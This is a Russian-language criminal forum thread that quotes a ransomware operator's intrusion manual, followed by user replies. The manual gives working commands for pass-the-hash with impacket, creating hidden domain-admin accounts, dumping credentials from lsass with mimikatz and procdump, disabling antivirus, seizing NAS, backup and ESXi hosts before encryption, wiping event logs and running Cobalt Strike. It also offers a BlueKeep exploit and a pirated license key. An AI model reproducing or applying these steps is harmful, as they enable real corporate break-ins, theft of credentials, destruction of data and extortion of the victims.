• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Видоизменённый углерод

Отслеживать
Пожалуйста, обратите внимание, что пользователь заблокирован
maihoand1999 сказал(а):
всем привет, метод добычи работает?
думай ищи свой уникальный метод ну а если для тренировки то да работает
 
yashechka сказал(а):
Пасс Зэ Хэш

Итак у нас есть хеши, но пароль от учетки админа мы не смогли получить. Возвращаемся в кали. Если закрыли консоль, то открываем снова и вводим:

cd impacket/examples
sudo python3 smbexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee
Administrator@192.168.16.27

либо

sudo python3 psexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee
Administrator@192.168.16.27

Данные подставляем полученные из эксплуатации Зэрологин

Посмотреть вложение 33776

После выполнения мы получим КМД на удаленной машине ДК– C:\Windows\system32>

Далее вводим следующие команды:

net user support Pa$$wo0rd /add
net user support /active:yes
net localgroup Administrators support /add

Если ломимся по "громкому" можем создать сразу своего доменного администратора

net group "Domain Admins" support /add

После этого мы получаем свою учетную запись с правами домен администратора, а соответственно можем вломится во все машины на домене по учетной записи:

support Pa$$wo0rd

Далее заходим ДК и снимаем креды домен админов мимикадзом64.exe или мимикодзам32.exe. Команды для мимикадза такие:

privilege::debug - log 1234.txt - sekurlsa::logonPasswords full

Обходы АВ

Мы подключились к компу. Первым делом смотрим трей возле часов и отображающиеся там значки и ищем ав. Если на компе установлен простой виндовс дефендер заходим в настройки и добавляем в исключения диск C:\

Посмотреть вложение 33777

Посмотреть вложение 33778

Обычно антивирусы без пароля можно тупо деинсталировать через мастер удаления программ в виндовс. Важно если мы видим установленные ав Софос (синего цвета) или Сентинель на всех машинах дальнейшая работа с данной компанией будет бессмысленна.
Другие же антивирусные решения можно спокойно убить через 2 тулзы:

- ГМЕР
- ПаверТул

Если ав убить не получается, то открываем реестр виндовс и переходим по пути:

HKEY_LOCAL_MACHINE\SOFTWARE

и ищем папки с названиями АВ

Если находим, то смотрим все подпапки которые есть в папке с ав. Наша цель найти папки и значения внутри них с названием Exclusions (исключения)

Предположим мы нашли значение исключений, допустим С:\users\admin\java.exe

Переименовываем наш мимикатз или вредонос в java.exe и кидаем по данному пути. Если такого пути или папок нет на этой машине создаем папки 1 в 1 как указано в исключениях и пробуем запустить наш файл. В большинстве случаев ав их не видит если, он не слишком умный ) Если у нас не выходит ничего из вышеперечисленного, топаем на все машины в домене по порту 3389 из сканера и смотрим установлен ли ав там.

Если ав не установлен на нескольких машинах можно закинуть туда портативный СофтПерфектСканер и просканить сеть изнутри смонтировать диски и запустить наш ****р извините подавился =D

Посмотреть вложение 33779

В идеале нужно убить ав везде где можно и добавить в исключения диски C:\ А компы на которых нет порта 3389 в том числе и НАС хранилища смонтировать и уже потом начинать л**** да что-ж такое =D

НАС и бекапы

Самая сложная часть )

Итак доступ к домен админу мы получили. Делаем скан сети изнутри. Смотрим все порты . Обычно нас хранилища висят на портах 5000, 5001, а бекапы Вим - 9443, 9392, 9393, 9401, 6160, Веритас Бэкап - 6101, 10000, 3527, 6106, 1125, 1434, 6102, сервер - 3527, 6106 либо они будут подписаны в имени хоста как НАС. Обычно насы висят вне домена. Первым делом смотрим скан. Если у нас появился доступ к ним из обычного скана с учетками домен админа все супер.

Однако если насы в воркгруппе можно пробить всех домен админов и попробовать залогинится в них по кредам без домена с пробитых учеток через веб интерефейс открыв айпи НАСА через браузер и указав порт НАСА через двоеточие. В 40% случаев креды домен админов должны подходить. Если не подходят, то берем учетку Administator и ее пароль. Логинимся в НАС как Admin с тем же паролем, либо перебираем пароли от других домен админов вероятность пробива повышается. Иногда при сканировании НАСов через СофтПерфектСканет отображаются учетные записи которые активны в хранилище обычно это: Admin, backup, Sysadm и прочее. Если мы открыли сеть через ПАСС ЗЭ ХЭШ ищем в результатах полученых хешей эти учетки и достаем от них пароли через сервис взлома хешей. С вимами и прочими бекапами та же тема. И самое важно на этапе ***** нам необходимо начинать с дисков и компов где больше всего памяти и от 500 гигов и больше. Соответственно самым важным и первым будет идеально зафигачить БИГДАТУ.

Посмотреть вложение 33780

VС и ESXI

Данный раздел за меня проведет великий и ужасный: Борис Николаевич Ельцин аka https://xss.pro/members/204378/


Фишка в том, что тебе ав не нужно обходить. Для начала нужно получить креды от вицентра. В 60 процентах он в домене и пускает по кредам ДК. В остальных случиях кейлогер. В своей работе я часто сталкиваюсь с задачей сброса рут пароля на esx. Представим ситуацию, что у нас есть креды администратора vcenter, есть домен админ и вся сеть готова к *****, но никак не удалоcь поймать пароль под esx, вот один из способов.

Без перезагрузки, без лишнего палева. НО Я НАСТОЯТЕЛЬНО РЕКОМЕНДУЮ РЕСИТЬ ПАСС В НОЧЬ ПЕРЕД НАКРЫВОМ СЕТИ. Т.е вы сбрасываете пароль и сразу шифруете. Этот способ заключается в том, что мы введем esx в домен и сможем авторизоваться по кредам доменного админа. Идем на ДК, открываем Active Directory Users and computers и создаем там глобальную группу ESX Admins, обязательно включаем туда своего доменного админа. Далее возвращаемся в vcenter. Выбираем esx хост нажимаем Сonfigure - Autentication Service - Join domain вводим домен в формате domain.local или domain.com. Какой домен можно узнать введя systeminfo на компе в домене. Вводим логин домен админа без домена и его пароль. Теперь все готово для авторизации, заходим в esx хост используя креды доменного админа и сбрасываем рут пасс. Потом просто по ыыр заходишь на esx. Выключаешь машины. И делаешь грязные дела =)

ПиЭсЭксзэк

В этом разделе мы рассмотрим тулзу ПиЭсЭксзэк и чем она будет полезна на практике. Первым делом она поможет нам запустить любой файл на всех тачках к которым у нас есть доступ. Предположим у нас есть exe файл который нам нужно запустить. Открываем КМД, перетаскиваем туда psexec.exe и далее пишем следующее:

Посмотреть вложение 33781

Если вы удалили все ав, добавили исключения и сделали все как нужно, то данный exe будет запущен на всех компах. Если вам нужно запустить файл от имени системы, то добавляем к параметрам -s -d -c файл.exe Через ПиЭсЭксзэк можно получить и снять креды с удаленных компов если на них нет 3389 порта, но учетка у нас есть. Через сканер открываем папку C$ закидываем туда pysecdump.exe и procdump.exe.

Посмотреть вложение 33782

Итак мы вошли в тачку делаем:

cd C:\
pysecdump.exe -s

Эта команда выдаст нам хеши админа на удаленном компе пытаемся поломать через сайт или используем ПАСС ЗЭ ХЭШ в кали на других тачках. Далее делаем так:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
procdump.exe --accepteula -ma lsass.exe lsass.dmp

В случае успеха на удаленной тачке на диске C:\ будет создан lsass.dmp файл.

Копируем его на свой комп рядом с мимикатзом. Открываем мимикатз и делаем в нем:

sekurlsa::minidump lsass.dmp
privilege::debug
log 1234.txt
sekurlsa::logonPasswords full

Он также выдаст нам креды или хеши. Далее можно попробовать удаленно включить рдп порт командой

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Не всегда срабатывает! После выполнения команды можно будет подрубится к РДП. Не забываем после всего удалить все файлы и следы работы на удаленной тачке.

После всех действий, если желаете минимально затереть следы своего пребывания и отложить взлом. На машинах в которые вы заходили по РДП можно открыть ПаверШелл и прописать следующее:

wevtutil el | Foreach-Object {wevtutil cl "$_"}

Эта регулярка сотрет все журналы.

Также команды на удаление скрытых учеток:

user support Pa$$wo0rd /delete
net group "Domain Admins" support /delete

Кобальт Страйк

Проще говоря выше описаные мной методы полностью нахрен исключают кобальт, ну если народ просит почему бы и нет?

Короче, арендуем сервак на линукс и закидываем туда кобальт и делаем в консоли:

cd cs4.0
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -javaagent:Hook.jar -classpath ./cobaltstrike.jar server.TeamServer АЙПИ СЕРВАКА 12345

Переходим на свою тачку, я работаю с винды в кобальте, для этого надо предварительно установить Яву. Запускаем cobaltstrike.bat

Посмотреть вложение 33783

Вводим айпи нашего арендованного хоста учетку и пароль который указан в конфиге выше. Идем в раздел:

Посмотреть вложение 33784

Создаем прослушиватель:

Посмотреть вложение 33785

Далее создаем пейлоад:

Посмотреть вложение 33786

После нажатия кнопки Генерейт у нас будет экзэшник. Пихаем его на ДК и запускаем там же. Далее делаем так:

Посмотреть вложение 33787

Там же делаем:

Посмотреть вложение 33788

Дальше идем в:

Посмотреть вложение 33789

Посмотреть вложение 33790


Выделяем все тачки в сети и пытаемся ломится в них по хешу админа:

Посмотреть вложение 33791

Посмотреть вложение 33792

Стоит упомянуть, что не всегда тачки выходят в общий инет. Тогда делаем

Посмотреть вложение 33793

Посмотреть вложение 33794

Мы превращаем зараженный комп в локальный прослушиватель на который будут стучать все тачки на районе =D. Про остальной функционал расписывать нет смысла, так как по мне кобальт подходит только для удобного снятия кредов и поиска кредов от НАСов. А так это просто гуан летучей мыши, которое палится как новогодняя елка всем чем можно, а крипт на это гуан стоит ебических денег и ты еще пограммиста найди который пейлоад перепишет, ага.

БЛЮ-КИП

Я жертвую вам в дар самописный эксплоит для 3389.

Посмотреть вложение 33795

Все что нужно сделать, это добавить айпи с 3389 в столбик без портов и запустить run.bat. Если открыть run.bat через текстовик мы увидим креды скрытой учетки, которая будет создаваться на пробитых экспом компах. Гуды будут сохранены в отдельный текстовик. Эксп сначала пытается перевести удаленные тачки в синий экран и ждет их перезагрузки. После перезагрузки он автоматически исполняет пейлоад и мы получаем скрытую учетку с правами админа на уязвимом компе.

Этот эксп необходимо перезапускать 2-3 раза, он не всегда срабатывает как нужно, это связано с таймингами перезапуска на удаленных тачках. Ну а теперь после того как мы похоронили селлеров рдп доступов можно переходить к заключению.

Тут собраны знания которые помогут вам заработать так или иначе это все, что я знал. Источник иллюстраций к данному мануалу взят из манхвы "Fish Eye Placebo" https://www.yuumeiart.com/ (Примечание от Яши: А я думал, что это все Шива :3 ). Я не спорю, что есть люди умнее меня и с куда белее обширным багажом знаний, но как по мне этого хватит для пентеста любой сети будь то цитрикс, циско, пало альто, фортик, пульс етк.

Бонус лицуха на софтперфект до 2022

dUYiN30Q4+ydHwgPCwku3K+FYDomodEqW0bRGcTyxvdnlc7g4nne7cfwXOGPJbBVdPeqEs7jzX2yDiVxxiiNaCvNK4T7ML0Qfarren5vr
MZEBcoOivf7QQ05BPxSG370cIus/AZxAuRAcibpckx1Ie+R4UTNiyBh6ZVcIwii+8M1lnRp+lcRmFqbgLGZ/cbzzh09IfaFKwoGJRPcTcnizxQtBJSk9sqlbNc6SwWeiQgl+0J+A1mrkrG3zd03vSjBUbc8daN08ebjOGYDsZVptkkhe5ASAJt/Uwzs0QCqO2issqS+QpE/atLV3lR63k/
2G1y6yECKu7w+s1SV9aEKsxKhuBJplKLhbGoQIX7hGxDwww1HFLGqCZbAce1mz7aP6xqqltEgoM2oVvKv02tVUoLGYSHYtAGGoaksl
XXu4+MLs26nLUoltIfIcOC1dOQsjChjXil8Im+dDOY+V1m5M0e2GckmBjTX4blWbz+hOmjl23n6f0jSndxT70Dd3Jl9

Посмотреть вложение 33796
а ведь ему пришлось взломать корпорацию ради гайда
 
Пожалуйста, обратите внимание, что пользователь заблокирован
akenov сказал(а):
а ведь ему пришлось взломать корпорацию ради гайда
3 если шо =) на 3 разных конторах 3 разные уязвимости + я далеко не тот кто мается херней с метасплоитабл или разворачивает свою сетку для тестов и обьясняет как это все работает. Мне похуй как это работает мне главное чтобы раскрывало все! :t
 
Bassterlord сказал(а):
3 если шо =) на 3 разных конторах 3 разные уязвимости + я далеко не тот кто мается херней с метасплоитабл или разворачивает свою сетку для тестов и обьясняет как это все работает. Мне похуй как это работает мне главное чтобы раскрывало все! :t
Когда ты выкрадешь все данные у Майкрософт, делая мануал по пентесту? Скоро будет отличная уязвимость в паблике🤫
 
Спасибо вам большое. Я тут не давно, но почитав разные ветки, я часто наталкиваюсь на ваши статьи. Очень грамотно и информативно. Спасибо вам за ваш труд. Особбенно за переводы.
 
JerryManson сказал(а):
подскажите, какой образ win10 брать? официальная сборка или какой-либо другой вариант
без разницы, тут это просто инструмент, чтобы с локалки не делать.
 
Последнее редактирование:
Присоединяюсь, реально сменит пусть ник, Админ ты меня не любишь из- за разоблачения чтения ЛС, но чел реально ник этот не заслужил. Имхо давайте я буду Greet или Ms'Rem, глупо.
 
В самом начале данного мануала фишай говорит закинуть на линуху fortinet vpn 123.deb. Но перед этим не сказал откуда его взять XD. Кто знает конкретно откуда и для чего подтягивается этот файл? Разжуйте непонимающему))
 
whiteblack сказал(а):
В самом начале данного мануала фишай говорит закинуть на линуху fortinet vpn 123.deb. Но перед этим не сказал откуда его взять XD. Кто знает конкретно откуда и для чего подтягивается этот файл? Разжуйте непонимающему))
можешь взять с офф сайта
как я понимаю после этого шума, набега школьников и т.д. фотики принудительно обновили свои клиенты, и тот експлойт которы использовался в его мануале теперь не актуален. Если не прав, поправьте.
 
BLUA сказал(а):
можешь взять с офф сайта
как я понимаю после этого шума, набега школьников и т.д. фотики принудительно обновили свои клиенты, и тот експлойт которы использовался в его мануале теперь не актуален. Если не прав, поправьте.
вполне возможно 0 доступов упало за сутки
 
whiteblack сказал(а):
вполне возможно 0 доступов упало за сутки
чё даже ни одного горшочка с мёдом :)? что-то киберсеки не хотят работать, или настолько стало это мамонтом, что даже они свои горшки обновили...гы.гы.гы
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх